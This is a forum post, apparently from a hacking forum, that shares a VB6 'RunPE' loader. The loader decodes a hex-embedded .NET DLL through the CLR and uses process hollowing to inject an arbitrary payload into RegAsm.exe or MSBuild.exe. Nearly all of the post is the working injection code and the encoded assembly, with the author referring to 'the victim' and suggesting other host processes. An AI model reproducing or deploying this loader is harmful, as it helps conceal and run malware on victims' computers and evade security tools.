Página 1 de 1

VB6 CLR RunPE x86 / Native & .NET

Publicado: 23 Nov 2019, 20:28
por Anony Hacker
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Hello friends
Imagen
[/font]

[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I took C# RunPE to import it into your favorite VB6 with the help of Common Language Runtime[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]So let's get started[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]For RunPE to work we need Net Framework 2.0, we need to import into our project two link in References:[/font]

Código: Seleccionar todo

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorlib.tlb
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Just stipulate that the work of the victim on the computer is not as it will not affect, now Net Framework is part of windows, it is in our hands[/font]

[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Now you can use this RunPE[/font][/font]


Código: Seleccionar todo

'''''''' RunPE .net CLR '''''''''
'''''''' By MR. MORFEY ''''''''''
''' My Telegram: M0RF3Y0x1337 '''

Private Declare Function DispCallFunc Lib "oleaut32" (ByVal pv As Long, ByVal ov As Long, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As Long, ByRef par As Variant) As Long
Private Declare Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As Long)
Private Declare Function VarPtrArray Lib "msvbvm60" Alias "VarPtr" (ByRef Ptr() As Any) As Long

Public Function RunPE(Arg As String, PayLoad() As Byte)
Dim host As New mscoree.CorRuntimeHost, dom As AppDomain
host.Start
host.GetDefaultDomain dom
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.hex"
Dim bytes() As Byte
ShellCode = ShellCode & "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005045"
ShellCode = ShellCode & "00004C010300997BD95D0000000000000000E00022210B010B000014000000060000000000008E32000000200000000000000000400000200000000200000400000000000000040000000000000000800000000200000000000003004085000010000010000000001000001000000000000010000000000000000000000034320000"
ShellCode = ShellCode & "57000000004000005803000000000000000000000000000000000000006000000C000000D43100001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000941200000020"
ShellCode = ShellCode & "00000014000000020000000000000000000000000000200000602E7273726300000058030000004000000004000000160000000000000000000000000000400000402E72656C6F6300000C0000000060000000020000001A000000000000000000000000000040000042000000000000000000000000000000007032000000000000"
ShellCode = ShellCode & "4800000002000500EC230000E80D000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001330020015000000000000000225280100000A037D0100000402047D020000042A000000133001000700000000000000027B010000042A001330"
ShellCode = ShellCode & "01000700000000000000027B020000042A7E7201000070280500000A720F00007003280600000A040517280F000006262A00133004001B00000001000011170A2B110203040528100000062C02172A0617580A061B31EB162A001B300A00D502000002000011160A725900007002280700000A0B1202FE15050000021203FE150400"
ShellCode = ShellCode & "00021202D005000002280800000A280900000A280A00000A7D0700000403280B00000A2D0D07726700007003280600000A0B02077E0C00000A7E0C00000A1620040000087E0C00000A141202120328040000062D06730D00000A7A041F3C280E00000A13040411041F3458280E00000A130520B30000008D11000001130611061620"
ShellCode = ShellCode & "020001009E280F00000A1A3315097B04000004110628050000062D1B730D00000A7A097B04000004110628060000062D06730D00000A7A11061F29941307161308097B0300000411071E5812081A120028090000062D06730D00000A7A110511083315097B030000041108280B0000062C06730D00000A7A0411041F5058280E0000"
ShellCode = ShellCode & "0A13090411041F5458280E00000A130A16130B097B030000041105110920003000001F40280C000006130C052D1E110C2D1A17130B097B0300000416110920003000001F40280C000006130C110C2D06730D00000A7A097B03000004110C04110A1200280A0000062D06730D00000A7A110420F800000058130D0411041C58281000"
ShellCode = ShellCode & "000A130E1613112B7004110D1F0C58280E00000A131204110D1F1058280E00000A131304110D1F1458280E00000A131411132C3811138D12000001131504111411151611158E69281100000A097B03000004110C111258111511158E691200280A0000062D06730D00000A7A110D1F2858130D1111175813111111110E328A110C28"
ShellCode = ShellCode & "1200000A130F097B0300000411071E58110F1A1200280A0000062D06730D00000A7A0411041F2858280E00000A1310110B2C041105130C11061F2C110C1110589E280F00000A1A3315097B04000004110628070000062D1B730D00000A7A097B04000004110628080000062D06730D00000A7A097B04000004280D00000615330673"
ShellCode = ShellCode & "0D00000A7ADE2326097B05000004281300000A281400000A131611162C0711166F1500000A161317DE02172A11172A000000411C0000000000003900000074020000AD02000023000000050000011E02281600000A2A42534A4201000100000000000C00000076322E302E35303732370000000005006C0000002C060000237E0000"
ShellCode = ShellCode & "98060000D004000023537472696E677300000000680B00006C00000023555300D40B0000100000002347554944000000E40B00000402000023426C6F62000000000000000200000057B5A2150902000000FA01330016C4000100000022000000050000000F0000001100000031000000220000001A00000001000000020000000200"
ShellCode = ShellCode & "0000010000000200000002000000020000000A0000000100000002000000020000000000E80201000000000006009002F70206002A016C030600FE00F7020600DF03F7020600FE03F70206006902AF0406000504F7020600B302F7020A00D70359030600EB00F7020600BD00F7020600C9026C0306001104F70206005203F7020600"
ShellCode = ShellCode & "2503F70206003F03F70206001A00F70206009A02F70206003803F70206007A04F7020600E100F7020600DE018B0306004B028B0306003E0113030600FE0113030600170213030600AC01130306007001130306003202130306008D0113030600550113030600F0006C030600160159038700AB030000000000004800000000000100"
ShellCode = ShellCode & "010001011000C901000005000100010001001000550000001500030004000B011000600000005500030012000B0110006B000000550007001200010060000A00010072000D0006006000EB0006006B00EB00060072001C01060099001C01060060001C0106006B000A00060072000A00060099000A000610A8021F010600B102EB00"
ShellCode = ShellCode & "0600BE02EB000600C502EB000600C702EB0050200000000086184C0314000100742000000000860060001A000300882000000000860072001E0003000000000080009160C9034400030000000000800091602F045B000D00000000008000916019045B000F00000000008000916056045B001100000000008000916040045B001300"
ShellCode = ShellCode & "00000000800091608A046200150000000000800091609C046D001A000000000080009160FE0278001F00000000008000916067047E00210000000000800091608300870026009B20000000008600900098002700BC200000000096002F03A4002A00E4200000000091006000A4002E00E4230000000086184C031000320000000100"
ShellCode = ShellCode & "6000000002007200000001000100000002000500000003002000000004002400000005002800000006002C00000007003800000008003C0000000900400000000A0044000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000010001000000020005000000"
ShellCode = ShellCode & "03002000000004002400000005002800000001000100000002000500000003002000000004002400000005002800000001000100000002000500000001000100000002000500000003002000000004002400000005002800000001000100000001006D0000000200BA0200000300760400000100C002000002009500000003005B00"
ShellCode = ShellCode & "00000400B20000000100010000000200050000000300200000000400240009004C03100011004C032A0019004C03350031004C03100039009B008C004100F00391004100F703CE005100CF00D4006100AA02DB0069000900E1004100BF04E60071003303EB0079004C03100081001200EE0071009F02F50081003000F90099008004"
ShellCode = ShellCode & "00018100BA030B016900120011014900740016014900F202100029004C031000B1004C032601B9004C031000C1004C035301C9004C035301D1004C035301D9004C035301E1004C035301E9004C035301F1004C035301F9004C03530101014C03530109014C03D5012E000B01AB012E001300A5012E0003012F002E00FB002F002E00"
ShellCode = ShellCode & "F3002F002E00EB0098012E00E3002F002E00DB0080012E00D30058012E000A0063012E00CB0058012E001301DC012E00C30034012E00BB002B0143001B003B00430013002F00800023005600A00023005600C00023005600E00023005600000123005600200123005600400123005600600123005600800123005600A00123005600"
ShellCode = ShellCode & "1600230101000000000004000100000000000500A000AD0002000100000051002200000053002600020002000300020003000500D102DE0204010900C903010000010B002F04010000010D001904010000010F00560401000001110040040100000113008A040100000115009C04010000011700FE02020000011900670401000001"
ShellCode = ShellCode & "1B0083000100048000000100000000000000000000000000C303000002000000000000000000000001006200000000000200000000000000000000000100F702000000000400030005000300000000000000000000415F3000415F3100546F55496E74333200546F496E74333200496E74333200415F3200415F3300415F3400415F"
ShellCode = ShellCode & "3500546F496E74313600415F3600415F3700415F3800415F39003C4D6F64756C653E004100430052756E504500646174610061006D73636F726C696200620070726F6300630047657450726F636573734279496400526573756D65546872656164004C6F616400636D64006400476574456E7669726F6E6D656E745661726961626C"
ShellCode = ShellCode & "6500636F6D70617469626C650052756E74696D655479706548616E646C65004765745479706546726F6D48616E646C650056616C756554797065005479706500477569644174747269627574650041747472696275746555736167654174747269627574650044656275676761626C6541747472696275746500436F6D5669736962"
ShellCode = ShellCode & "6C6541747472696275746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275746500417373656D626C7946696C6556657273696F6E41747472696275746500417373656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C79"
ShellCode = ShellCode & "4465736372697074696F6E41747472696275746500446F746675736361746F7241747472696275746500436F6D70696C6174696F6E52656C61786174696F6E7341747472696275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F707972696768744174747269627574650041737365"
ShellCode = ShellCode & "6D626C79436F6D70616E794174747269627574650052756E74696D65436F6D7061746962696C697479417474726962757465005375707072657373556E6D616E61676564436F64655365637572697479417474726962757465004174747269627574650042797465006765745F53697A6500650053697A654F66006600537472696E"
ShellCode = ShellCode & "67004172670067007061746800680069004D61727368616C006B65726E656C33322E646C6C006E74646C6C2E646C6C00436C6173732E646C6C004B696C6C0053797374656D004E74556E6D6170566965774F6653656374696F6E0053797374656D2E5265666C656374696F6E00457863657074696F6E0052756E005A65726F004275"
ShellCode = ShellCode & "6666657200426974436F6E766572746572002E63746F7200496E745074720053797374656D2E446961676E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74696D652E436F6D70696C6572536572766963657300446562756767696E674D6F646573004765"
ShellCode = ShellCode & "74427974657300436C6173730043726561746550726F636573730050726F63657373004174747269627574655461726765747300436F6E63617400466F726D6174004F626A65637400456E7669726F6E6D656E7400436F6E7665727400576F773634476574546872656164436F6E7465787400476574546872656164436F6E746578"
ShellCode = ShellCode & "7400576F773634536574546872656164436F6E7465787400536574546872656164436F6E74657874005669727475616C416C6C6F6345780070617900417272617900426C6F636B436F7079005265616450726F636573734D656D6F727900577269746550726F636573734D656D6F72790053797374656D2E53656375726974790049"
ShellCode = ShellCode & "734E756C6C4F72456D70747900000000000D570069006E0044006900720000495C004D006900630072006F0073006F00660074002E004E00450054005C004600720061006D00650077006F0072006B005C00760032002E0030002E00350030003700320037005C00000D200022007B0030007D0022000003200000005C34360349F5"
ShellCode = ShellCode & "EE4AAE76F941D7E8422B0008B77A5C561934E08902060E02060803200001052002010E080320000E032000080328000E03280008042001010205010000000005200101111108010001000000000011000A020E0E18180209180E101114101110040100000006000202181D080A000502180810080810080A00050218081D05081008"
ShellCode = ShellCode & "05000208180808000508180808080804000108180400010E0E0600030E0E0E0E072003010E0E1D0503070108080004020E0E1D0502200718080E1114111008081D0808080808020808061D0508080808081D051225020500020E0E1C0600011229112D0500010812290400010908040001020E020618060002081D05080300000806"
ShellCode = ShellCode & "0002061D05080A000501125108125108080500011D0508040001080905000112250802060903061D05021E2404200101080801000800000000001E01000100540216577261704E6F6E457863657074696F6E5468726F777301042001010E0A010005436C61737300001C0100133030303A303A303A352E34322E302E393531340000"
ShellCode = ShellCode & "0000000017010012436F7079726967687420C2A920203230313900000C010007312E302E302E3000000501000100002901002431393661366538342D383337652D346236342D623964362D6462626132353839343764330000062001011180890801000200000000001C012D405E5F606B626D646F6B656C6B686B6A767370744142"
ShellCode = ShellCode & "43444546000000000000997BD95D000000000200000041000000F0310000F01300005253445369C8DB59B1CE1947866EE477F8F0230201000000443A5C436C6173735C62696E5C44656275675C446F7466757363617465645C436C6173732E706462000000005C32000000000000000000007E320000002000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000703200000000000000000000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000FC0200000000000000000000"
ShellCode = ShellCode & "FC0234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000000100560061007200460069006C00650049006E0066006F0000000000240004000000"
ShellCode = ShellCode & "5400720061006E0073006C006100740069006F006E00000000000000B0045C020000010053007400720069006E006700460069006C00650049006E0066006F0000003802000001003000300030003000300034006200300000001A000100010043006F006D006D0065006E007400730000000000000022000100010043006F006D00"
ShellCode = ShellCode & "700061006E0079004E0061006D0065000000000000000000340006000100460069006C0065004400650073006300720069007000740069006F006E000000000043006C006100730073000000300008000100460069006C006500560065007200730069006F006E000000000031002E0030002E0030002E003000000034000A000100"
ShellCode = ShellCode & "49006E007400650072006E0061006C004E0061006D006500000043006C006100730073002E0064006C006C0000004800120001004C006500670061006C0043006F007000790072006900670068007400000043006F0070007900720069006700680074002000A90020002000320030003100390000002A00010001004C0065006700"
ShellCode = ShellCode & "61006C00540072006100640065006D00610072006B00730000000000000000003C000A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D006500000043006C006100730073002E0064006C006C0000002C0006000100500072006F0064007500630074004E0061006D0065000000000043006C006100"
ShellCode = ShellCode & "730073000000340008000100500072006F006400750063007400560065007200730069006F006E00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C0079002000560065007200730069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "0000000000000000000000000000000000000000000000000000003000000C000000903200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
ShellCode = ShellCode & "000000000000000000000000000000000000"
EL.Text = ShellCode
bytes = EL.NodeTypedValue
Dim vTypes(0 To 1) As Integer
Dim vValues(0 To 1) As Long
Dim pPArry As Long: pPArry = VarPtrArray(bytes)
Dim pArry As Long
RtlMoveMemory pArry, ByVal pPArry, 4
Dim vWrap: vWrap = pArry
vValues(0) = VarPtr(vWrap)
vTypes(0) = 16411
Dim pRef As Long: pRef = 0
Dim vWrap2: vWrap2 = VarPtr(pRef)
vValues(1) = VarPtr(vWrap2)
vTypes(1) = 16396
Call DispCallFunc(ObjPtr(dom), 45 * 4, 4, vbLong, 2, vTypes(0), vValues(0), 0)
Dim aRef As mscorlib.Assembly
RtlMoveMemory aRef, pRef, 4
aRef.CreateInstance("RunPE").Load "RegAsm.exe", Arg, PayLoad
End Function
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Let me tell you about the parameters[/font]
[/font]
[/font]

[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]You can pass arguments to the process[/font]

[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]Injection by Default occurs in "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe", you can use another process from this directory, for example MSBuild.exe[/font]
[font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif][font=Roboto, "Helvetica Neue", Helvetica, Arial, sans-serif]I hope that you would understand everything, now I wish you good luck 
Imagen
[/font]

[/font]
[/font]